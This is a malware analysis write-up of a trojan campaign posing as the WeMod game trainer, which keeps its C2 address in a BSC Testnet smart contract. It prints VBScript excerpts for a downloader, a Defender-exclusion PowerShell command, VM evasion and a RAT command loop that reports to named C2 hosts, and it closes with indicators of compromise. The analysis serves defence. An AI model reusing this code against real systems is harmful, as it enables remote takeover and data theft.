Fake WeMod Malware Analysis: Blockchain-Powered Game Cheat Trojan
Fake WeMod Malware Analysis 
Executive Summary
IMPORTANT DISCLAIMER: This analysis covers a FAKE malware campaign that impersonates WeMod. The real WeMod (https://www.wemod.com) is a legitimate and safe game trainer software. This malware has NO affiliation with the actual WeMod company.
This malware campaign masquerades as WeMod - a legitimate and popular game trainer/cheat software. The threat actors have created fake distribution sites (wemodpc.com - NOT the real site) to lure gamers looking for free cheats, particularly for games like Subnautica.
What makes this malware particularly interesting is its use of blockchain technology (BSC Testnet) to store and retrieve C2 (Command & Control) server URLs, making the infrastructure harder to take down and providing a decentralized, censorship-resistant way to maintain command of infected machines.
Discovery & Initial Analysis
I was browsing GitHub when I stumbled upon a repository with a README that linked to wemodpc.com - immediately suspicious since the real WeMod site is wemod.com.

Visiting the fake site, I was surprised to find it looks nearly identical to the official WeMod website. Same branding, same layout, same promises - an average user would have no idea they're on a malicious clone. This level of effort in creating a convincing fake site shows we're dealing with a relatively sophisticated operation.
Downloading their "WeMod Setup" gave me a wemod-setup.zip containing two files:
WeMod.exe- The main executablewemod.dll- A companion DLL file

The trick here is that the executable is signed by Adersoft - the company behind VBSEdit, a legitimate VBScript development tool. This immediately told me we're dealing with a VBSEdit-compiled payload. But here's the thing - if the EXE is just the Adersoft loader, then the actual malicious payload must be hiding somewhere else. VBSEdit-compiled executables store their scripts externally, usually in an accompanying DLL. So the real question became: what's in that DLL?
The "Empty" DLL Mystery
Opening wemod.dll in IDA Pro or any disassembler - it appears almost empty with no meaningful code sections. No imports, no exports, no executable code - just... nothing.

This threw me off initially, so I loaded it up in ImHex (my beloved
) to get a better look at the raw structure. ImHex's pattern matching system is perfect for situations like this - it can parse PE structures and highlight anomalies that traditional disassemblers miss.
Pro tip for the malware authors: padding this DLL with some junk code would've made it way less obvious that something fishy is going on here. You're welcome. ![]()
I knew the payload had to be in this DLL based on how VBSEdit works, but there was nothing visible in the code sections. Why would a malware author distribute an empty DLL? The EXE clearly depends on it (won't run without it), but there's nothing there... or so it seems.
But when I checked the Resources section of the DLL, things got interesting. The resources weren't empty at all! Hidden within the PE resource section was data that doesn't show up in normal analysis tools.

The PE resource section contains hidden data that standard analysis overlooks.
Opening the DLL in Resource Hacker exposed the payload - the actual malicious VBScript hiding in the resources:

' Extracted VBS dropper (truncated)
Dim http, shell, fso
Set http = CreateObject("MSXML2.XMLHTTP")
Set shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
' Query blockchain for C2...
http.Open "POST", rpcEndpoint, False
http.SetRequestHeader "Content-Type", "application/json"
http.Send "{""jsonrpc"":""2.0"",""method"":""eth_call""..."
Key Insight: This "empty DLL" trick is used by all subsequent payloads in this campaign. The EXE is just a loader that reads and executes the VBScript hidden in the DLL's resources! This is a clever technique because:
- Static analysis tools often skip "empty" files
- The actual malicious code is Base64-Encoded within PE resources, evading signature detection
- The Adersoft signature on the EXE provides false legitimacy
Wait... Is That Blockchain?
Digging into the extracted VBScript, something immediately caught my eye - the malware is making JSON-RPC calls to what looks like... a blockchain? ![]()
' Build the JSON-RPC request to query the smart contract
rpcBody = "{""jsonrpc"":""2.0"",""id"":1,""method"":""eth_call"",""params"":[{" & _
"""to"":""" & contractAddress & """"," & _
"""data"":""0xe2d84e23""},""latest""]}"
http.Open "POST", "https://bsc-testnet.publicnode.com", False
http.SetRequestHeader "Content-Type", "application/json"
http.Send rpcBody
' Parse the hex response to get C2 URL
response = http.responseText
c2Url = HexToString(ParseJsonResponse(response))
This is wild - the malware is querying a smart contract on the BSC Testnet to retrieve its C2 server URL. This is my first time seeing blockchain used for malware C2 in the wild - it's a relatively rare technique. But first, let's walk through what each stage of the infection actually does.
Stage 1: The Dropper
Capabilities
The initial dropper is relatively simple but effective. Here's the core download and execution logic:
' Download the next stage payload
payloadPath = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\update_data.zip"
extractPath = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\app_config"
http.Open "GET", payloadUrl, False
http.SetRequestHeader "Referer", "facebook.com"
http.Send
' Write ZIP to disk
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' Binary
stream.Open
stream.Write http.responseBody
stream.SaveToFile payloadPath, 2
stream.Close
' Extract and execute
Set shellApp = CreateObject("Shell.Application")
shellApp.Namespace(extractPath).CopyHere shellApp.Namespace(payloadPath).Items, 16
' Launch next stage
shell.Run """" & extractPath & "\setup_helper.exe""", 0, False
In summary, the dropper:
- Queries blockchain for C2 URL via JSON-RPC call
- Fetches payload URL from C2 (
smartsoftarena.com) with the facebook.com referer trick - Downloads ZIP payload from
savuklubi.comorsperianism.comto%LOCALAPPDATA%\update_data.zip - Extracts contents to
%LOCALAPPDATA%\app_config - Creates launcher script (
run_helper.vbs) for persistence - Executes
setup_helper.exeto continue the infection
The Referer Trick
You might have noticed the "facebook.com" referer header in the code above. This is a clever anti-analysis technique used throughout the entire infection chain - all HTTP requests to the C2 and payload servers require this specific Referer header or they redirect you to Google.
Why "facebook.com"? This choice is deliberate:
- Looks like legitimate social media traffic in network logs
- Security researchers may miss this requirement when manually testing
- Automated sandbox systems often don't set custom headers
- Without the correct referer, you just get redirected to Google - nothing suspicious looking
This simple trick effectively breaks most automated analysis systems. Keep an eye out for this header in the code samples - it appears in every stage.
Kill Switch
Interestingly, the C2 can respond with "2" to trigger a fake Windows error and terminate the infection. This gives the attackers a way to abort infections remotely:
ElseIf k = "2" Then
MsgBox "Error 0xc0000906", 16 ' Fake Windows error
WScript.Quit
End If
This could be used to avoid infecting machines in certain regions, or to shut down the campaign if it attracts too much attention. In fact, the C2 returned "2" when I tested from my country without a VPN - looks like they're excluding certain regions, probably third world countries or places with lots of security researchers. ![]()
Stage 2: Persistence & Evasion
This stage focuses on establishing persistence and evading detection. It employs several techniques:
VM/Sandbox Detection
Before doing anything malicious, the payload checks if it's running in a virtual machine or sandbox:
' Check for VM UUIDs
If Len(Trim(uuid)) = 0 Or _
uuid = "00000000-0000-0000-0000-000000000000" Or _
uuid = "FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF" Then
WScript.Quit ' Likely a VM, abort!
End If
These UUID patterns are common in VMs and sandboxes, so the malware exits silently if detected.
Windows Defender Exclusions
The malware adds exclusions to Windows Defender to avoid future detection - including a particularly dangerous one:
psCmd1 = "Add-MpPreference -ExclusionPath '" & path & "'" & vbCrLf & _
"Add-MpPreference -ExclusionPath '" & SystemRoot & "\System32'"
shell.Run "powershell -ep Bypass -EncodedCommand " & EncodePS(psCmd1), 0, True
Red Flag: Adding System32 to Defender exclusions is extremely dangerous! This essentially gives any malware free reign in one of the most critical Windows directories.
Scheduled Tasks for Persistence
Two scheduled tasks ensure the malware survives reboots and continues running:
| Task Name | Executable | Interval | Privilege |
|---|---|---|---|
CfgHelper | CfgHelper.exe | Every 30 minutes | HIGHEST |
CfgMgr | CfgMgr.exe | Every 5 minutes | HIGHEST |
The Decoy: Maintaining the Illusion
To maintain the illusion that the victim actually installed WeMod, the malware runs the legitimate WeMod installer in the background:
shell.Run """" & path & "\Config\WeMod-Setup.exe""", 0, False
The Illusion
: The victim gets their expected "WeMod" installation and has no idea that malware is now running alongside it. This is social engineering at its finest - the user got what they wanted, so they have no reason to suspect anything.
Stage 3: The RAT
This is the main Remote Access Trojan (RAT) component that turns the infected machine into a bot. The core of this stage is an infinite loop that polls the C2 for commands:
' Main RAT loop - runs forever
Do While True
On Error Resume Next
' Check in with C2 for commands
http.Open "POST", c2Url & "/dataG.php", False
http.SetRequestHeader "Referer", "facebook.com"
http.Send "bot_id=" & uuid & "&action=getTask"
cmd = http.responseText
If Len(cmd) > 0 Then
' Parse and execute command
Select Case Split(cmd, "|")(0)
Case "exec" : shell.Run Split(cmd, "|")(1), 0, False
Case "download" : DownloadAndRun Split(cmd, "|")(1)
Case "shell" : ExecuteShellCommand Split(cmd, "|")(1)
End Select
End If
WScript.Sleep 60000 ' Check every 60 seconds
Loop
Capabilities
| Feature | Description |
|---|---|
| Bot Registration | Sends UUID, IP, OS, computer name to C2 |
| Command Polling | Checks in with C2 every 60 seconds |
| File Download | Download and execute arbitrary files |
| Remote Shell | Execute arbitrary commands via cmd.exe |
| Archive Handling | Extract ZIP/RAR (includes bundled WinRAR) |
| Multi-format Execution | Runs EXE, DLL, BAT, PS1, VBS files |
| Self-Cleanup | Deletes old files to avoid detection |
Bot Checkin Data
When the bot first registers with the C2, it sends system information:
' Gather system info for registration
uuid = GetUUID()
localIP = GetLocalIP()
os = GetObject("winmgmts:").ExecQuery("Select * from Win32_OperatingSystem").ItemIndex(0).Caption
computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%")
' Register with C2
http.Open "POST", c2Url & "/help.php", False
http.SetRequestHeader "Referer", "facebook.com"
http.Send "ip=" & localIP & _
"&os=" & os & _
"&bot_id=" & uuid & _
"&computer_name=" & computerName & _
"&client_id=" & "g5466435" ' Campaign identifier
The
client_id (g5466435) appears to be a campaign identifier, suggesting the attacker may be running multiple campaigns.
Blockchain C2 & Anti-Analysis Tricks
Now let's dig into what makes this malware's infrastructure interesting - the blockchain-based C2.
The Smart Move: Decentralized C2
Instead of hardcoding C2 domains (which can be easily blocked or taken down), the malware queries a smart contract on the BNB Smart Chain (BSC) Testnet to retrieve the current C2 URL. This is a clever evolution in malware infrastructure. ![]()

Contract Details
| Property | Value |
|---|---|
| Network | BSC Testnet |
| Contract Address (Dropper) | 0xA513Fe0A0289C33a8AE7e1DAA8F79A35CC10379a |
| Contract Address (Payload2) | 0xCbd36D9EBb84789F74e01c9EFFdF6a2fb8Bc275e |
| Function Selector | 0xe2d84e23 |
RPC Endpoints Used
The malware has multiple fallback RPC endpoints hardcoded - if one fails, it tries the next:
' Array of BSC Testnet RPC endpoints for redundancy
Dim rpcEndpoints(2)
rpcEndpoints(0) = "https://bsc-testnet.publicnode.com"
rpcEndpoints(1) = "https://bsc-testnet-dataseed.bnbchain.org"
rpcEndpoints(2) = "https://bsc-testnet.drpc.org"
' Try each endpoint until one works
For Each endpoint In rpcEndpoints
On Error Resume Next
http.Open "POST", endpoint, False
http.Send rpcBody
If http.Status = 200 Then Exit For
Next
Why BSC Testnet?
- Free: No gas fees on testnet means zero operational cost
- Persistent: Blockchain data is immutable - can't be deleted
- Hard to takedown: No centralized authority to send abuse reports to
- Easy updates: Attacker can update C2 URL anytime by calling the contract
C2 Infrastructure
Identified Domains
| Domain | Purpose |
|---|---|
wemodpc.com | FAKE WeMod distribution site (NOT the real wemod.com!) |
smartsoftarena.com | C2 server / Bot registration |
savuklubi.com | Payload hosting |
sperianism.com | Payload hosting |
C2 Endpoints
https://smartsoftarena.com/673643686578679/help.php - UUID registration
https://smartsoftarena.com/673643686578679/dataG.php - Bot command server
Indicators of Compromise (IOCs)
File System
%LOCALAPPDATA%\update_data.zip
%LOCALAPPDATA%\app_config\
%LOCALAPPDATA%\run_helper.vbs
%LOCALAPPDATA%\install_log.txt
%PROGRAMDATA%\app_config\
%APPDATA%\app_config\log_32.txt
%APPDATA%\app_config\log_64.txt
Scheduled Tasks
CfgHelper (runs every 30 minutes)
CfgMgr (runs every 5 minutes)
Network
# Blockchain RPC (suspicious if from non-crypto application)
bsc-testnet.publicnode.com
bsc-testnet-dataseed.bnbchain.org
bsc-testnet.drpc.org
# C2 Domains
smartsoftarena.com
savuklubi.com
sperianism.com
This analysis is for educational and defensive purposes only.
Always analyze malware in isolated environments.